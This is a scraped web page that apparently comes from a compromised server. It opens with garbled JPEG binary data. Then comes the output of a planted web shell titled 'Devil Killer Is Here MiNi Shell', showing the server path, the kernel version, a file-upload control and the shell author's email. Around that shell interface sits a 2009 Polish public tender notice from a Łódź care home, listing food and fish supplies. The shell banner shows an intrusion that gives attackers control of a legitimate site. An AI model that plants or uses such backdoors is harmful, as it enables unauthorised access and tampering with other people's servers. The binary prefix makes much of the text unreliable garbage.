JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090317/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090317/65950-N-2009.html

<p class="kh_header"><b>Łódź: DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH ORAZ RYB I PRZETWORÓW RYBNYCH</b><br>
<b>Numer ogłoszenia: 65950 - 2009; data zamieszczenia: 17.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej , ul. Dojazdowa 5/7, 91-503 Łódź, woj. łódzkie, tel. 042 6598799, faks 042 6598799.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH ORAZ RYB I PRZETWORÓW RYBNYCH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa do siedziby Zamawiającego w Łodzi  artykułów spożywczych oraz ryb i przetworów rybnych wyszczególnionych w załączniku do ogłoszenia.Zamawiający dopuszcza oferty równoważne..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.20.00.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający warunki zawarte w art. 22 ust.1 pkt 1-3 i niewykluczeni na podstawie art. 24 Ustawy. 

Ocena spełniania wyżej wymienionych warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych poniżej..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia, że Wykonawca spełnia warunki z art.22 ust.1 - 3 oraz nie podlega wykluczeniu na podstawie art. 24 Ustawy Zamawiający żąda następujących dokumentów:

1.	oświadczenie, że  Wykonawca  spełnia  warunki  o których  mowa  w  art.  22  ust. 1  pkt. 1 - 4 ustawy Prawo zamówień publicznych - załącznik nr 2 do SIWZ,
2.	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.ipzp.pl/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej
	ul. Dojazdowa
	90-051 Łódź.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.03.2009 godzina 08:00, miejsce: Dom Pomocy Społecznej
	ul. Dojazdowa
	90-051 Łódź.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa towaru
	Jednostka miary	Ilość wg jednostki miary z kolumny nr 3
1	2	3	4
1	Herbata granulowana (torebki 100g)	Op.	71
2	Herbata owocowa różne smaki -opakowanie:20 saszetek x 1,5g	Op.	90
3	Kawa zbożowa typu Inka (opakowanie 150g)	Op.	127
4	Mięta (opakowanie:20 saszetek x 1,5g.)	Op.	83
5	Kakao opakowanie 100 g.	Op.	103
6	Rodzynki opakowanie 100 g.	Op.	97
7	Pieprz prawdziwy (na wagę)	Kg	22
8	Koncentrat pomidorowy 30% - opakowanie 870 g.	Op.	40
9	Koncentrat pomidorowy 30% - opakowanie 200 g.	Op.	291
10	Cynamon opakow. - 1kg	Kg.	4
11	Proszek do pieczenia opakow. 30 g	Op.	29
12	Cukier waniliowy opakow. 32 g. 	Op.	27
13	Olej opakow. - 1 litr	Litr	214
14	Maggi opakow. -1 litr	Litr	119
15	Majeranek  (na wagę)	Kg	1,20
16	Ziele angielskie (na wagę)	Kg	0,50
17	Żelatyna opakow. - 30 g.	Op.	85
18	Kwasek cytrynowy opakow. 1 kg	Op.	12
19	Miód naturalny - opakow. 230 g.	Op.	96
20	Miód sztuczny - opakow. 370 g.	Op.	9
21	Liść laurowy (na wagę)	Kg	0,70
22	Kostki rosołowe opakow. 100 g.	Op.	39
23	Ocet - opakow. 0,5 l	Op.	14
24	Sok owocowy - butelki 0,5 l	Op.	171
25	Kompoty różne smaki - słoiki 850 g	Op.	233
26	Kukurydza konserwowa - puszki 400 g.	Op.	84
27	Groszek konserwowy - puszki 390 g.	Op.	63
28	Dżemy owocowe (różne smaki) - słoiki 0,33 kg	Op.	637
29	Przyprawa warzywna do potraw typu Jarzynka opakow - 1 kg	Kg	8
30	Przyprawa warzywna do potraw typu Jarzynka opakow - 0,2 kg	Op.	225
31	Ananasy - puszki 580 g.	Op.	165
32	Brzoskwinie - puszki 850 g.	Op.	180
33	Podgrzybki (na wagę)	Kg	2
34	Ogórki konserwowe - słoiki 850 g.	Op.	68
35	Galaretka owocowa (na wagę)	kg	46,50
36	Kisiel różne smaki (na wagę)	Kg.	37,50
37	Budyń różne smaki (na wagę)	Kg.	31
38	Majonez - słoiki 850 g.	Op.	61
39	Musztarda - słoiki 200 g.	Op.	86
40	Chrzan tarty - słoiki 300 g	Op.	126
41	Ketchup - opakowanie 250 g.	Op.	50
42	Przecier szczawiowy - słoiki 400 g.	Op.	12
43	Śliwki suszone - na wagę	Kg	11,10
44	Gałka muszkatołowa - na wagę	Kg	0,50
45	Czekolada - opakow. 100 g.	Op.	367
46	Wafelki w czekoladzie typu Prince-Polo opakow. 20g.	Op.	210
47	Cukierki owocowe - na wagę	kg	10
48	Cukierki (galaretki owocowe) - opakow. 100 g.	Op.	82
49	Zające czekoladowe - 75 g.	Szt.	82
50	Zające czekoladowe - 100 g	Szt.	80
51	Mikołaje czekoladowe - 100 g.	Szt.	82
52	Ciastka deserowe typu Delicje opak 147 g.	Op.	180
53	Chałwa opakow. -100 g.	Op.	90
54	Cukierki czekoladowe - na wagę	kg	20
55	Ciastka drobne różne smaki - kartony 3 kg	kg	100
56	Drożdże - opakow. - 1 kg	kg	4,50
57	Rodzynki - opakow. - 200 g.	Op.	50
58	Krakersy opakow - 180 g.	Op.	80
59	Biszkopty opakow - 180 g.	op	80
60	Bita śmietana w sprayu opakow. - 250 ml	Op	30
61	Sok pomidorowy - karton 1L	Op.	50
62	Sok  owocowy - karton - 1l	Op.	100
63	Cukier - opakow - 1 kg	Kg	1200
64	Cukier puder - op. - 0,5 kg	kg	4
65	Mąka pszenna - opakow. - 1 kg	Kg.	980
66	Mąka ziemniaczana - opakow. - 1 kg	kg	53
67	Płatki owsiane - opakow. - 0,5 kg	kg	88,50
68	Kasza manna - opakow. - 1 kg	Kg.	158,50
69	Płatki kukurydziane - opakow. 0,25 kg	Op.	35
70	Kasza grycz. - op0,50 kg	kg	65
71	Kasza jęczmienna- op. - 1 kg	kg	250
72	Makaron różny - op. 1 kg	kg	790
73	Sól - opakow. 1 kg	kg	500
74	Mak - na wagę	kg	1
75	Groch łuskany - na wagę	kg	45
76	Ryż - opakow - 1 kg	kg	400
77	Fasola Jaś - na wagę	kg	25
78	Sos do sałatek (surówek) rózne smaki torebki 10g	Szt.	50
79	Sosy: czosnkowy, chili, majonezowy, ziołowy, koperkowy (słoiki 180g)	Szt.	40
80	Sałatka szopska słoik 400g	szt.	50
81	Sos boloński (słoiki 350g)	Szt.	40
82	Herbata ekspressowa 20 szt. w opak.	Op.	100
83	Herbata ekspressowa typu Lipton opak - 100 szt.	Op.	400 szt.
84	Suchary	Kg	10
85	Herbatniki małe op. 80g	op.	100
86	Rodzynki w czekoladzie op. 80g	Op	100
87	Bombonierki op. 100g	Op	100
88	Bombonierki typu TOFFIFEE 125g	Op	100
89	Krem czekoladowy typu nutella	Szt.	100
90	Cukierki typu Rafaello 40g	Szt.	100
91	Pierniki w czekoladzie op. 150g	Op.	100
92	Sok owocowy butelki lub kartoniki po 150 g	Szt.	160.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> DOSTAWA RYB I PRZETWORÓW RYBNYCH.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Tuńczyk w sosie natur. kawałki	Puszki 170 g	Szt.	270
2	Śledź admirał. (majtasy)	Wiadra plastikowe 8 kg	Szt.	50
3	Śledź (matiasy)	Wiadra plastikowe 4kg	szt	96
4	Ryba panga mrożona filety	Tafle	Kg	200
5	Miruna mrożona filety
	Tafle	Kg	226
6	Paprykarz szczeciński	Pudełka 135 g.	Szt.	1008
7	Szproty w oleju (wędzone lub podwędzane)	pudełka 150g	Szt.	500
8	Śledź po kaszubsku	Wiadra plastikowe 3 kg	Kg	21
9	Makrela wędzona
	Karton	Kg	172
10	Szproty w pomidorach	Puszki 170g	Szt.	500
11	Krajanka żydowska	Wiadra plastikowe 3 kg	kg	36
12	Karp świeży	-	Kg	100
13	Koreczki śledz. wykwintne	Wiadra plastikowe 3 kg	kg	9
14	Pasta z tuńczyka
	Pudełka 80g	Szt.	70
15	Pasta z makreli
	Pudełka 80g	Szt.	70
16	Szproty wędzone
	-	Kg	64
17	Tuńczyk sałatkowy w oleju	Puszki 185 g	szt	40
18	Łosoś plastry 100g
	Vac. 100g	Kg	10
19	Pasta z łososia 
ABBA	Tuby 145 g	Szt.	30
20	Pasta z tuńczyka ABBA	Tuby 145 g	Szt.	30
21
	Pasta z piklinga ABBA 	Tuby 145 g	Szt.	30
22	Śledź wędzony	-	Kg	20.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com